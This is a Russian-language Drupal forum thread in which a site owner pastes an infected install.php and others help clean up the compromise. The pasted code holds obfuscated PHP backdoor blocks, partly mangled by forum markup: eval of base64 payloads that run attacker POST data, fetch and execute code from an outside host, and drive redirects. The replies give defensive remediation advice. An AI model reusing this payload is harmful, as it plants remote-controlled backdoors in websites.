Всем привет!
Пару недель назад Яндекс Вебмастер начал репортить о вредоносных кодах на паре страниц. Не придал значения - нажал "исправлено", ошибка пропала.
А тут захожу на главную - сайт редиректит на чужую страницу.
Полез в папки, нашел install.php файл с атрибутами (777) и вот таким кодом:
Что это такое и как его побороть теперь??
<?php /*457563643*/ error_reporting(0);
[user=
ini_set]ini_set[/user
]('error_log',
NULL);
[user=
ini_set]ini_set[/user
]('log_errors',
0);
[user=
ini_set]ini_set[/user
]('display_errors',
'Off');
[user=
eval]eval[/user
]( base64_decode('aWYobWQ1KCRfUE9TVFsicGYiXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29va2llc19wIl0pKTsgfQ0KaWYgKHN0cnBvcygkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSwgInBvc3RfcmVuZGVyIiApICE9PSBmYWxzZSkgeyAkcGF0Y2hlZGZ2ID0gIkdIS0FTTVZHIjsgfQ0KaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10gKSApIHsgaWYobWQ1KCRfUkVRVUVTVFsnZmRnZGZndnYnXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgJHBhdGNoZWRmdiA9ICJTREZERlNERiI7IH0gfQ0KDQppZigkcGF0Y2hlZGZ2ID09PSAiR0hLQVZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vbm9ydHNlcnZpcy5uZXQvc2Vzc2lvbi5waHA/aWQiLCBmYWxzZSAsJGNvbnRleHRfamhrYik7DQppZigkdmtmdSkgeyBAZXZhbCgkdmtmdSk7IH0gZWxzZSB7b2Jfc3RhcnQoKTsgIGlmKCFAaGVhZGVyc19zZW50KCkpIHsgQHNldGNvb2tpZSgiY29uZHRpb25zIiwiMiIsdGltZSgpKzE3MjgwMCk7IH0gZWxzZSB7IGVjaG8gIjxzY3JpcHQ+ZG9jdW1lbnQuY29va2llPSdjb25kdGlvbnM9MjsgcGF0aD0vOyBleHBpcmVzPSIuZGF0ZSgnRCwgZC1NLVkgSDppOnMnLHRpbWUoKSsxNzI4MDApLiIgR01UOyc7PC9zY3JpcHQ+IjsgfSA7fTsNCiB9DQoNCiB9'));
[user=
ini_restore]ini_restore[/user
]('error_log');
[user=
ini_restore]ini_restore[/user
]('display_errors');
/*457563643*/ ?
><?php ?
><?php /*67458335*/ error_reporting(0);
[user=
ini_set]ini_set[/user
]('error_log',
NULL);
[user=
ini_set]ini_set[/user
]('log_errors',
0);
[user=
ini_set]ini_set[/user
]('display_errors',
'Off');
[user=
eval]eval[/user
]( base64_decode('aWYobWQ1KCRfUE9TVFsicGYiXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29va2llc19wIl0pKTsgfQppZiAoc3RycG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAicG9zdF9yZW5kZXIiICkgIT09IGZhbHNlKSB7ICRwYXRjaGVkZnYgPSAiR0hLQVNNVkciOyB9CmlmKCBpc3NldCggJF9SRVFVRVNUWydmZGdkZmd2diddICkgKSB7IGlmKG1kNSgkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10pID09PSAiOTNhZDAwM2Q3ZmM1N2FhZTkzOGJhNDgzYTY1ZGRmNmQiKSB7ICRwYXRjaGVkZnYgPSAiU0RGREZTREYiOyB9IH0KCmlmKCRwYXRjaGVkZnYgPT09ICJHSEtBU01WRyIgKSB7IEBvYl9lbmRfY2xlYW4oKTsgIGRpZTsgIH0KCmlmIChzdHJwb3MoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdLCAiV2luIiApID09PSBmYIGltcGxvZGUoInwiLCAkZ2hmanUpIC4gIi9pIiwgJGJrbGpnKSkgb3IgKEAkX0NPT0tJRVsnY29uZHRpb25zJ10pICBvciAoISRia2xqZykgb3IgKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSA9PT0gImh0dHA6Ly8iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPKCR2a2Z1KSB7IEBldmFsKCR2a2Z1KTsgfSBlbHNlIHtvYl9zdGFydCgpOyAgaWYoIUBoZWFkZXJzX3NlbnQoKSkgeyBAc2V0Y29va2llKCJjb25kdGlvbnMiLCIyIix0aW1lKCkrMTcyODAwKTsgfSBlbHNlIHsgZWNobyAiPHNjcmlwdD5kb2N1bWVudC5jb29raWU9J2NvbmR0aW9ucz0yOyBwYXRoPS87IGV4cGlyZXM9Ii5kYXRlKCdELCBkLU0tWSBIOmk6cycsdGltZSgpKzE3MjgwMCkuIiBHTVQ7Jzs8L3NjcmlwdD4iOyB9IDt9Owp9Cn0K'));
[user=
ini_restore]ini_restore[/user
]('error_log');
[user=
ini_restore]ini_restore[/user
]('display_errors');
/*67458335*/ ?
><?php /*564794552*/ error_reporting(0);
[user=
ini_set]ini_set[/user
]('error_log',
NULL);
[user=
ini_set]ini_set[/user
]('log_errors',
0);
[user=
ini_set]ini_set[/user
]('display_errors',
'Off');
[user=
eval]eval[/user
]( base64_decode('aWYobWQ1KCRfUE9TVFsicGYiXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29va2llc19wIl0pKTsgfQppZiAoc3RycG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAicG9zdF9yZW5kZXIiICkgIT09IGZhbHNlKSB7ICRwYXRjaGVkZnYgPSAiR0hLQVNNVkciOyB9CmlmKCBpc3NldCggJF9SRVFVRVNUWydmZGdkZmd2diddICkgKSB7IGlmKG1kNSgkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10pID09PSAiOTNhZDAwM2Q3ZmM1N2FhZTkzOGJhNDgzYTY1ZGRmNmQiKSB7ICRwYXRjaGVkZnYgPSAiU0RGREZTREYiOyB9IH0KaWYoJHBhdGNoZWRmdiA9PT0gIkdIS0FTTVZHIiApIHsgQG9iX2VuZF9jbGVhbigpOyAgZGllOyAgfQoKaWYgKHN0cnBvcygkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sICJXaW4iICkgPT09IGZhbHNlKSB7ICRramRrZV9jID0gMTsgfQplcnJvcl9yZXBvcnRpbmcoMCk7CmlmKCEka2pka2VfYykgeyBnbGAwKTsgfSBlbHNlIHsgZWNobyAiPHNjcmlwdD5kb2N1bWVudC5jb29raWU9J2NvbmR0aW9ucz0yOyBwYXRoPS87IGV4cGlyZXM9Ii5kYXRlKCdELCBkLU0tWSBIOmk6cycsdGltZSgpKzE3MjgwMCkuIiBHTVQ7Jzs8L3NjcmlwdD4iOyB9IDt9Owp9Cn0K'));
[user=
ini_restore]ini_restore[/user
]('error_log');
[user=
ini_restore]ini_restore[/user
]('display_errors');
/*564794552*/ ?
><?php /*435345352*/ error_reporting(0);
[user=
ini_set]ini_set[/user
]('error_log',
NULL);
[user=
ini_set]ini_set[/user
]('log_errors',
0);
[user=
ini_set]ini_set[/user
]('display_errors',
'Off');
[user=
eval]eval[/user
]( base64_decode('aWYobWQ1KCRfUE9TVFsicGYiXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29va2llc19wIl0pKTsgfQppZiAoc3RycG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAicG9zdF9yZW5kZXIiICkgIT09IGZhbHNlKSB7ICRwYXRjaGVkZnYgPSAiR0hLQVNNVkciOyB9CmlmKCBpc3NldCggJF9SRVFVRVNUWydmZGdkZmd2diddICkgKSB7IGlmKG1kNSgkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10pID09PSAiOTNhZDAwM2Q3ZmM1N2FhZTkzOGJhNDgzYTY1ZGRmNmQiKSB7ICRwYXRjaGVkZnYgPSAiU0RGREZTREYiOyB9IH0KaWYoJHBhdGNoZWRmdiA9PT0gIkdIS0FTTVZHIiApIHsgIEBvYl9lbmRfY2xlYW4oKTsgIGRpZTsgICB9'));
[user=
ini_restore]ini_restore[/user
]('error_log');
[user=
ini_restore]ini_restore[/user
]('display_errors');
/*435345352*/ ?
><?php
/**
* file
* Initiates a browser-based installation of Drupal.
*/
/**
* Defines the root directory of the Drupal installation.
*/
define('DRUPAL_ROOT', getcwd());
/**
* Global flag to indicate the site is in installation mode.
*/
define('MAINTENANCE_MODE', 'install');
// Exit early if running an incompatible PHP version to avoid fatal errors.
if (version_compare(PHP_VERSION, '5.2.4') < 0) {
print 'Your PHP installation is too old. Drupal requires at least PHP 5.2.4. See the <a href="http://drupal.org/requirements">system requirements</a> page for more information.';
exit;
}
// Start the installer.
require_once DRUPAL_ROOT . '/includes/install.core.inc';
install_drupal();
Комментарии
там еще много вот такой лабуды , в верхнем сообщении она не отображается почему-то
base64_decode('aWYobWQ1KCRfUE9TVFsicGYiXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29va2llc19wIl0pKTsgfQ0KaWYgKHN0cnBvcygkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSwgInBvc3RfcmVuZGVyIiApICE9PSBmYWxzZSkgeyAkcGF0Y2hlZGZ2ID0gIkdIS0FTTVZHIjsgfQ0KaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10gKSApIHsgaWYobWQ1KCRfUkVRVUVTVFsnZmRnZGZndnYnXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgJHBhdGNoZWRmdiA9ICJTREZERlNERiI7IH0gfQ0KDQppZigkcGF0Y2hlZGZ2ID09PSAiR0hLQVZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vbm9ydHNlcnZpcy5uZXQvc2Vzc2lvbi5waHA/aWQiLCBmYWxzZSAsJGNvbnRleHRfamhrYik7DQppZigkdmtmdSkgeyBAZXZhbCgkdmtmdSk7IH0gZWxzZSB7b2Jfc3RhcnQoKTsgIGlmKCFAaGVhZGVyc19zZW50KCkpIHsgQHNldGNvb2tpZSgiY29uZHRpb25zIiwiMiIsdGltZSgpKzE3MjgwMCk7IH0gZWxzZSB7IGVjaG8gIjxzY3JpcHQ+ZG9jdW1lbnQuY29va2llPSdjb25kdGlvbnM9MjsgcGF0aD0vOyBleHBpcmVzPSIuZGF0ZSgnRCwgZC1NLVkgSDppOnMnLHRpbWUoKSsxNzI4MDApLiIgR01UOyc7PC9zY3JpcHQ+IjsgfSA7fTsNCiB9DQoNCiB9')); @ini_restore('error_log'); @ini_restore('display_errors'); /
Это заражение сайта, вовремя не обновленного до версии 7.59. Лечить руками. Внимательно. Чистить файлы, чистить базу. Если вылечите не всё, то через несколько дней всё повторится.
Готов помочь с лечением, пишите в личку
Вероятнее всего вы не обновили версию ядра, из-за чего вас взломали. У ядер ниже 7.58 выявлена критическая уязвимость.
Теперь вам необходимо:
1. Обновить все модули и ядро перезаливкой.
2. Скачать утилиту ai-bolit и пробежаться ею в параноидальном режиме.
3. Посмотреть папку files на предмет скриптов.
4. Очень внимательно посмотреть содержание папки libraries на предмет вирусни.
5. Проверить на наличие пхп вхождений базу данных.
6. Проверить нет ли лишних пользователей с ролью администраторов и вообще посмотреть внимательно на права.
Ну или обращайтесь, поможем.
Всем еще раз привет и спасибо за ответы!
Дааа, я уже увидел - залезло везде где только можно! Я уже начал вычищать, но видимо, трудности еще впереди. Если сам не справлюсь, придется обращаться.
Дрянь расползлась по сайту =).
Вот самое страшное- это проверить БД, пока не представляю как это сделать даже. Ибо php включен я так понимаю, он может вызываться из БД, а не только из кода в файле?
Да, при наличии php-фильтра, боты создают в БД ноды/блоки с кодом для заливки шеллов. Даже если вычистить файлы, они смогут продолжать владеть сайтом используя эти ноды/блоки
Оно ещё и где нельзя залезло;)
БД проверяется очень просто - дамп базы на комп, блокнот (ну или что-то в стиле notepad++, akelapad, etc ибо объёмно) и банальный поиск.
можно просто воспользоваться поиском в phpmyadmin
Итог- сайт попал в блок, как вредоносный))) пушистый зверек прям!
Промежуточный итог чистки:
1- настроение конечно испортилось, даже не хотел браться за это сегодня, но ... на мины
2- провел анализ папок! Выяснилось, что эта дрянь поразила все доступные php файлы - прямо вначале файла даписало бяку как писал выше!
3- в папках где вирус получил доступ он создал свои новые зараженные файлы php с этой же бякой
5 в корне сайта создалось около 5 новых зараженных файлов!
6- БД вроде как не задело!!!!
Радостные новости: когда давно еще делал сайт - работал под разными фтп пользователями!!! И что получилось - вирус поразил только те файлы и папки, права которых принадлежали фтп пользователю сайта!!! А там где права остались пользователя root от операционки - вирус ничего не сделал!!! Как итог - всего поразилось около 20-30 php файлов, и еще около 20 вирус создал новых!
Т. е. моя криворукость пошла на пользу!! Большие папки такие как moduls где миллин php файлов остались нетронуты вроде как!!!
Процесс лечения:
Ненужные файлы заменил из нового архива друпал, нужные лечил руками - удалил вредоносные строки!
Почти на все папки и файлы права присвоил root пользователя)
Появились вопросы - как вирус проник и получил доступ? И почему он поразил файлы и папки именно пользователя сайта?
Как защитить остальные свои сайты от такой напасти?
Сайт перестал редиректить, пока работа восстановлена - буду держать на контроле!
Ну и ядро конечно же обновил до последней версии!
Я так и сделал - только пробовал найти элементы текста из зараженных строк - совпадений было ноль)) Надеюсь прогесло!
"Доктор у моего друга подозрение на триппер"
Если бы вы знали сколько на Монстре продается сборок в которых некоторые вещи выводятся с помощью php фильтра вставленного в блоки. Это опасно? Предполагается что редактировать блоки может только админ. А зарегистрированных пользователей на сайте вообще нет.
Когда злоумышленники могут создавать любые файлы в каталоге с сайтом, стать админом - дело 1 минуты. Если вы об этом
А как создать любой файл в каталоге с сайтом? Что в корне сайта прямо?
По-моему если такая возможность есть уже пофиг включен ли PHP фильтр.
Или я не в ту степь.
Используя критическую уязвимость, которая присутствует до версии 7.59
Всем привет!
Второй день пока полет нормальный! Слежу за содержимом папок и отсутствием редиректов! Также пока что яндекс вебмастер молчит о вирусной активности! Может и отделаюсь малой кровью!
Может кто знает или может сказать нде почитать - как начинается такое заражение? Т. е. это бот или человек начинает заражение? Т. е. может человек заходит - пишет какой код в комменты и начинается взлом? Или просто бот обходит сайты и находит жертву?
Боты, человек только если прошаренный и вы ему очень насолили
По моим ощущениям 99.9% взломов это автоматическое добавление в разные ботнеты.
Странно, так как не могу изменить тему и добавить [РЕШЕНО], то пишу тут - РЕШЕНО!
ИТОГИ
1 - Ищем в файлах на сервере злополучный код и удаляем его - а лучше вообще обновить ядро до последней версии. В оставшихся папках снова ищем по файлам строки вируса и удаляем.
2- Потом проверяем на всякий базу по ключевым словам - например из кода вируса.
Вроде как помогло.
Потому что не надо писать в заголовке "решено", потому и не можете
А как выглядят зараженные файлы php и зараженный код?
https://drupal.ru/node/136938